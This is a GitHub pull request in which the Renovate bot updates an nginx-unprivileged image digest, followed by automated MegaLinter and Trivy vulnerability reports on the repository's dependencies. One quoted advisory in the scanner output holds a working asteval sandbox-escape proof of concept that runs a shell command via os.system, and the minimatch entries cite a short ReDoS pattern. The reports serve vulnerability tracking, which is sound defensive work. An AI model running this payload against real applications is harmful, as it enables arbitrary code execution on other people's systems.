Skip to content

chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 204990d#630

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5
Open

chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 204990d#630
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Feb 23, 2026

This PR contains the following updates:

Package Update Change
docker.io/nginxinc/nginx-unprivileged digest 79f2c2c204990d

Configuration

📅 Schedule: Branch creation - Between 12:00 AM and 03:59 AM, only on Monday ( * 0-3 * * 1 ) (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot requested a review from chgl as a code owner February 23, 2026 01:23
renovate-approve-2[bot]
renovate-approve-2 bot previously approved these changes Feb 23, 2026
renovate-approve[bot]
renovate-approve bot previously approved these changes Feb 23, 2026
@github-actions
Copy link

github-actions bot commented Feb 23, 2026

⚠️MegaLinter analysis: Success with warnings

Descriptor Linter Files Fixed Errors Warnings Elapsed time
✅ ACTION actionlint 4 0 0 0.11s
✅ BASH bash-exec 4 0 0 0.04s
✅ BASH shellcheck 4 0 0 0.3s
✅ BASH shfmt 4 0 0 0.01s
✅ DOCKERFILE hadolint 1 0 0 1.75s
✅ EDITORCONFIG editorconfig-checker 50 0 0 0.04s
✅ JSON jsonlint 4 0 0 0.41s
✅ JSON npm-package-json-lint yes no no 0.66s
✅ JSON prettier 4 0 0 0.93s
✅ JSON v8r 4 0 0 8.48s
⚠️ MARKDOWN markdownlint 5 9 0 1.13s
✅ REPOSITORY checkov yes no no 43.38s
✅ REPOSITORY devskim yes no no 2.09s
✅ REPOSITORY gitleaks yes no no 1.07s
✅ REPOSITORY git_diff yes no no 0.01s
⚠️ REPOSITORY grype yes 8 2 48.4s
✅ REPOSITORY kics yes no no 15.0s
✅ REPOSITORY secretlint yes no no 2.15s
✅ REPOSITORY syft yes no no 3.2s
⚠️ REPOSITORY trivy yes 8 2 12.78s
✅ REPOSITORY trivy-sbom yes no no 0.71s
✅ REPOSITORY trufflehog yes no no 4.4s

Detailed Issues

⚠️ REPOSITORY / grype - 8 errors
warning: A medium vulnerability in github-action package: aquasecurity/trivy-action, version 0.33.1 was found at: /.github/workflows/daily-trivy-scan.yaml

error: A high vulnerability in npm package: minimatch, version 10.1.1 was found at: /package-lock.json

error: A high vulnerability in npm package: minimatch, version 10.1.1 was found at: /package-lock.json

error: A high vulnerability in npm package: minimatch, version 10.1.1 was found at: /package-lock.json

error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt

error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt

error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt

error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt

warning: A medium vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt

error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt

warning: 2 warnings emitted
error: 8 errors emitted
⚠️ MARKDOWN / markdownlint - 9 errors
samples/charts/sample/README.md:5:9 MD026/no-trailing-punctuation Trailing punctuation in heading [Punctuation: ';']
samples/charts/sample/README.md:8:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo add chgl https://c..."]
samples/charts/sample/README.md:9:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo update"]
samples/charts/sample/README.md:10:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm search repo chgl/sample..."]
samples/charts/sample/README.md:11:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:28:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:40:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm uninstall sample -n sam..."]
samples/charts/sample/README.md:90:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:97:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
⚠️ REPOSITORY / trivy - 8 errors
error: Package: minimatch
Installed Version: 10.1.1
Vulnerability CVE-2026-26996
Severity: HIGH
Fixed Version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3
Link: [CVE-2026-26996](https://avd.aquasec.com/nvd/cve-2026-26996)
    ┌─ package-lock.json:922:1
    │  
922 │ ╭     "node_modules/minimatch": {
923 │ │       "version": "10.1.1",
924 │ │       "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.1.1.tgz",
925 │ │       "integrity": "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==",
    · │
935 │ │       }
936 │ │     },
    │ ╰^
    │  
    = minimatch: minimatch: Denial of Service via specially crafted glob patterns
    = minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.

error: Package: minimatch
Installed Version: 10.1.1
Vulnerability CVE-2026-27903
Severity: HIGH
Fixed Version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3
Link: [CVE-2026-27903](https://avd.aquasec.com/nvd/cve-2026-27903)
    ┌─ package-lock.json:922:1
    │  
922 │ ╭     "node_modules/minimatch": {
923 │ │       "version": "10.1.1",
924 │ │       "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.1.1.tgz",
925 │ │       "integrity": "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==",
    · │
935 │ │       }
936 │ │     },
    │ ╰^
    │  
    = minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
    = minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.

error: Package: minimatch
Installed Version: 10.1.1
Vulnerability CVE-2026-27904
Severity: HIGH
Fixed Version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4
Link: [CVE-2026-27904](https://avd.aquasec.com/nvd/cve-2026-27904)
    ┌─ package-lock.json:922:1
    │  
922 │ ╭     "node_modules/minimatch": {
923 │ │       "version": "10.1.1",
924 │ │       "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.1.1.tgz",
925 │ │       "integrity": "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==",
    · │
935 │ │       }
936 │ │     },
    │ ╰^
    │  
    = minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
    = minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

error: Package: asteval
Installed Version: 1.0.5
Vulnerability CVE-2025-24359
Severity: HIGH
Fixed Version: 1.0.6
Link: [CVE-2025-24359](https://avd.aquasec.com/nvd/cve-2025-24359)
    ┌─ requirements.txt:149:1
    │
149 │ asteval==1.0.5 \
    │ ^
    │
    = ASTEVAL is an evaluator of Python expressions and statements. Prior to ...
    = ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.

error: Package: asteval
Installed Version: 1.0.5
Vulnerability GHSA-vp47-9734-prjw
Severity: HIGH
Fixed Version: 1.0.6
Link: [GHSA-vp47-9734-prjw](https://github.com/advisories/GHSA-vp47-9734-prjw)
    ┌─ requirements.txt:149:1
    │
149 │ asteval==1.0.5 \
    │ ^
    │
    = ASTEVAL Allows Malicious Tampering of Exposed AST Nodes Leads to Sandbox Escape
    = ### Summary
      If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.
      
      ### Details
      The vulnerability is rooted in how `asteval` performs attribute access verification. In particular, the [`on_attribute`](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L565) node handler prevents access to attributes that are either present in the `UNSAFE_ATTRS` list or are formed by names starting and ending with `__`, as shown in the code snippet below:
      
      ```py
          def on_attribute(self, node):    # ('value', 'attr', 'ctx')
              """Extract attribute."""
      
              ctx = node.ctx.__class__
              if ctx == ast.Store:
                  msg = "attribute for storage: shouldn't be here!"
                  self.raise_exception(node, exc=RuntimeError, msg=msg)
      
              sym = self.run(node.value)
              if ctx == ast.Del:
                  return delattr(sym, node.attr)
              #
              unsafe = (node.attr in UNSAFE_ATTRS or
                       (node.attr.startswith('__') and node.attr.endswith('__')))
              if not unsafe:
                  for dtype, attrlist in UNSAFE_ATTRS_DTYPES.items():
                      unsafe = isinstance(sym, dtype) and node.attr in attrlist
                      if unsafe:
                          break
              if unsafe:
                  msg = f"no safe attribute '{node.attr}' for {repr(sym)}"
                  self.raise_exception(node, exc=AttributeError, msg=msg)
              else:
                  try:
                      return getattr(sym, node.attr)
                  except AttributeError:
                      pass
      ```
      
      While this check is intended to block access to sensitive Python dunder methods (such as `__getattribute__`), the flaw arises because instances of the `Procedure` class expose their AST (stored in the `body` attribute) without proper protection:
      
      ```py
      class Procedure:
          """Procedure: user-defined function for asteval.
      
          This stores the parsed ast nodes as from the 'functiondef' ast node
          for later evaluation.
      
          """
      
          def __init__(self, name, interp, doc=None, lineno=0,
                       body=None, args=None, kwargs=None,
                       vararg=None, varkws=None):
              """TODO: docstring in public method."""
              self.__ininit__ = True
              self.name = name
              self.__name__ = self.name
              self.__asteval__ = interp
              self.raise_exc = self.__asteval__.raise_exception
              self.__doc__ = doc
              self.body = body
              self.argnames = args
              self.kwargs = kwargs
              self.vararg = vararg
              self.varkws = varkws
              self.lineno = lineno
              self.__ininit__ = False
      ```
      
      Since the `body` attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a `Procedure` during runtime to leverage unintended behaviour.
      
      The exploit works as follows:
      
      1. **The Time of Check, Time of Use (TOCTOU) Gadget:**
      
         In the [code](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L577) below, a variable named `unsafe` is set based on whether `node.attr` is considered unsafe:
      
         ```python
         unsafe = (node.attr in UNSAFE_ATTRS or
                   (node.attr.startswith('__') and node.attr.endswith('__')))
         ```
      
      2. **Exploiting the TOCTOU Gadget:**
      
         An attacker can abuse this gadget by hooking any `Attribute` AST node that is not in the `UNSAFE_ATTRS` list. The attacker modifies the `node.attr.startswith` function so that it points to a custom procedure. This custom procedure performs the following steps:
         
         - It replaces the value of `node.attr` with the string `"__getattribute__"` and returns `False`.
         - Thus, when `node.attr.startswith('__')` is evaluated, it returns `False`, which causes the condition to short-circuit and sets `unsafe` to `False`.
         - However, by that time, `node.attr` has been changed to `"__getattribute__"`, which will be used in the subsequent `getattr(sym, node.attr)` call. An attacker can then use the obtained reference to `sym.__getattr__`to retrieve malicious attributes without needing to pass the `on_attribute` checks.
      
      ### PoC
      The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:
      
      ```py
      from asteval import Interpreter
      aeval = Interpreter()
      code = """
      ga_str = "__getattribute__"
      def lender():
          a
          b
      def pwn():
          ga = lender.dontcare
          init = ga("__init__")
          ga = init.dontcare
          globals = ga("__globals__")
          builtins = globals["__builtins__"]
          importer = builtins["__import__"]
          importer("os").system("whoami")
      
      def startswith1(str):
          # Replace the attr on the targeted AST node with "__getattribute__"
          pwn.body[0].value.attr = ga_str
          return False    
      
      def startswith2(str):
          pwn.body[2].value.attr = ga_str
          return False    
      
      n1 = lender.body[0]
      n1.startswith = startswith1
      pwn.body[0].value.attr = n1
      
      n2 = lender.body[1]
      n2.startswith = startswith2
      pwn.body[2].value.attr = n2
      
      pwn()
      """
      aeval(code)
      ```

error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-66418
Severity: HIGH
Fixed Version: 2.6.0
Link: [CVE-2025-66418](https://avd.aquasec.com/nvd/cve-2025-66418)
     ┌─ requirements.txt:1700:1
     │
1700 │ urllib3==1.26.20 \
     │ ^
     │
     = urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion
     = urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a 

(Truncated to 13333 characters out of 18094)

See detailed reports in MegaLinter artifacts

You could have the same capabilities but better runtime performances if you use a MegaLinter flavor:

Your project could benefit from a custom flavor, which would allow you to run only the linters you need, and thus improve runtime performances. (Skip this info by defining FLAVOR_SUGGESTIONS: false)

  • Documentation: Custom Flavors
  • Command: npx mega-linter-runner@9.2.0 --custom-flavor-setup --custom-flavor-linters ACTION_ACTIONLINT,BASH_EXEC,BASH_SHELLCHECK,BASH_SHFMT,DOCKERFILE_HADOLINT,EDITORCONFIG_EDITORCONFIG_CHECKER,JSON_JSONLINT,JSON_V8R,JSON_PRETTIER,JSON_NPM_PACKAGE_JSON_LINT,MARKDOWN_MARKDOWNLINT,REPOSITORY_CHECKOV,REPOSITORY_DEVSKIM,REPOSITORY_GIT_DIFF,REPOSITORY_GITLEAKS,REPOSITORY_GRYPE,REPOSITORY_KICS,REPOSITORY_SECRETLINT,REPOSITORY_SYFT,REPOSITORY_TRIVY,REPOSITORY_TRIVY_SBOM,REPOSITORY_TRUFFLEHOG

MegaLinter is graciously provided by OX Security

@renovate renovate bot changed the title chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 7599b95 chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 0ac6770 Feb 23, 2026
@renovate renovate bot force-pushed the renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5 branch from e87acfd to b507e0e Compare February 23, 2026 06:03
renovate-approve[bot]
renovate-approve bot previously approved these changes Feb 23, 2026
renovate-approve-2[bot]
renovate-approve-2 bot previously approved these changes Feb 23, 2026
@renovate renovate bot force-pushed the renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5 branch 3 times, most recently from 33023aa to df59a6b Compare February 27, 2026 23:55
@github-actions
Copy link

Trivy image scan report

ghcr.io/chgl/kube-powertools:pr-630 (ubuntu 24.04)

90 known vulnerabilities found (CRITICAL: 0 HIGH: 0 MEDIUM: 50 LOW: 40)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
curl CVE-2025-14017 MEDIUM 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
curl CVE-2025-10148 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
curl CVE-2025-14524 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
curl CVE-2025-14819 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
curl CVE-2025-15079 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
curl CVE-2025-15224 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libc-bin CVE-2025-15281 MEDIUM 2.39-0ubuntu8.6 2.39-0ubuntu8.7
libc-bin CVE-2026-0861 MEDIUM 2.39-0ubuntu8.6 2.39-0ubuntu8.7
libc-bin CVE-2026-0915 MEDIUM 2.39-0ubuntu8.6 2.39-0ubuntu8.7
libc6 CVE-2025-15281 MEDIUM 2.39-0ubuntu8.6 2.39-0ubuntu8.7
libc6 CVE-2026-0861 MEDIUM 2.39-0ubuntu8.6 2.39-0ubuntu8.7
libc6 CVE-2026-0915 MEDIUM 2.39-0ubuntu8.6 2.39-0ubuntu8.7
libcurl3t64-gnutls CVE-2025-14017 MEDIUM 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl3t64-gnutls CVE-2025-10148 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl3t64-gnutls CVE-2025-14524 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl3t64-gnutls CVE-2025-14819 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl3t64-gnutls CVE-2025-15079 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl3t64-gnutls CVE-2025-15224 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl4t64 CVE-2025-14017 MEDIUM 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl4t64 CVE-2025-10148 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl4t64 CVE-2025-14524 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl4t64 CVE-2025-14819 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl4t64 CVE-2025-15079 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libcurl4t64 CVE-2025-15224 LOW 8.5.0-2ubuntu10.6 8.5.0-2ubuntu10.7
libexpat1 CVE-2026-24515 MEDIUM 2.6.1-2ubuntu0.3 2.6.1-2ubuntu0.4
libexpat1 CVE-2026-25210 MEDIUM 2.6.1-2ubuntu0.3 2.6.1-2ubuntu0.4
libgnutls30t64 CVE-2025-14831 MEDIUM 3.8.3-1.1ubuntu3.4 3.8.3-1.1ubuntu3.5
libgnutls30t64 CVE-2025-9820 LOW 3.8.3-1.1ubuntu3.4 3.8.3-1.1ubuntu3.5
libpython3.12-minimal CVE-2025-11468 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2025-12084 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2025-13837 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2025-15282 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2025-15366 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2025-15367 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2026-0672 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-minimal CVE-2026-0865 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2025-11468 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2025-12084 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2025-13837 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2025-15282 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2025-15366 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2025-15367 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2026-0672 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libpython3.12-stdlib CVE-2026-0865 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
libssh-4 CVE-2026-0964 MEDIUM 0.10.6-2ubuntu0.2 0.10.6-2ubuntu0.3
libssh-4 CVE-2026-0967 MEDIUM 0.10.6-2ubuntu0.2 0.10.6-2ubuntu0.3
libssh-4 CVE-2026-0968 MEDIUM 0.10.6-2ubuntu0.2 0.10.6-2ubuntu0.3
libssh-4 CVE-2025-8277 LOW 0.10.6-2ubuntu0.2 0.10.6-2ubuntu0.3
libssh-4 CVE-2026-0965 LOW 0.10.6-2ubuntu0.2 0.10.6-2ubuntu0.3
libssh-4 CVE-2026-0966 LOW 0.10.6-2ubuntu0.2 0.10.6-2ubuntu0.3
libssl-dev CVE-2025-15467 MEDIUM 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2025-68160 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2025-69418 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2025-69419 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2025-69420 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2025-69421 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2026-22795 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl-dev CVE-2026-22796 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2025-15467 MEDIUM 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2025-68160 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2025-69418 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2025-69419 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2025-69420 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2025-69421 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2026-22795 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
libssl3t64 CVE-2026-22796 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2025-15467 MEDIUM 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2025-68160 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2025-69418 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2025-69419 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2025-69420 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2025-69421 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2026-22795 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
openssl CVE-2026-22796 LOW 3.0.13-0ubuntu3.6 3.0.13-0ubuntu3.7
python3.12 CVE-2025-11468 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2025-12084 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2025-13837 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2025-15282 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2025-15366 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2025-15367 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2026-0672 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12 CVE-2026-0865 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2025-11468 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2025-12084 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2025-13837 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2025-15282 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2025-15366 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2025-15367 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2026-0672 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11
python3.12-minimal CVE-2026-0865 MEDIUM 3.12.3-1ubuntu0.10 3.12.3-1ubuntu0.11

No Misconfigurations found

Node.js

3 known vulnerabilities found (CRITICAL: 0 HIGH: 3 MEDIUM: 0 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
minimatch CVE-2026-26996 HIGH 10.1.1 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3
minimatch CVE-2026-27903 HIGH 10.1.1 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3
minimatch CVE-2026-27904 HIGH 10.1.1 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

No Misconfigurations found

Python

7 known vulnerabilities found (CRITICAL: 0 HIGH: 5 MEDIUM: 2 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
asteval CVE-2025-24359 HIGH 1.0.5 1.0.6
asteval GHSA-vp47-9734-prjw HIGH 1.0.5 1.0.6
filelock CVE-2026-22701 MEDIUM 3.20.1 3.20.3
urllib3 CVE-2025-66418 HIGH 1.26.20 2.6.0
urllib3 CVE-2025-66471 HIGH 1.26.20 2.6.0
urllib3 CVE-2026-21441 HIGH 1.26.20 2.6.3
urllib3 CVE-2025-50181 MEDIUM 1.26.20 2.5.0

No Misconfigurations found

root/.local/share/helm/plugins/helm-local-chart-version/local-chart-version

49 known vulnerabilities found (HIGH: 12 MEDIUM: 35 LOW: 0 CRITICAL: 2)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
google.golang.org/protobuf CVE-2024-24786 MEDIUM v1.21.0 1.33.0
k8s.io/apimachinery GHSA-74fp-r6jw-h4mp HIGH v0.0.0-20180103014849-68f9c3a1feb3 0.0.0-20190927203648-9ce6eca90e73
k8s.io/apimachinery CVE-2020-8559 MEDIUM v0.0.0-20180103014849-68f9c3a1feb3 0.16.13, 0.17.9, 0.18.7
stdlib CVE-2024-24790 CRITICAL v1.20.4 1.21.11, 1.22.4
stdlib CVE-2025-68121 CRITICAL v1.20.4 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2023-29403 HIGH v1.20.4 1.19.10, 1.20.5
stdlib CVE-2023-39325 HIGH v1.20.4 1.20.10, 1.21.3
stdlib CVE-2023-45283 HIGH v1.20.4 1.20.11, 1.21.4, 1.20.12, 1.21.5
stdlib CVE-2023-45288 HIGH v1.20.4 1.21.9, 1.22.2
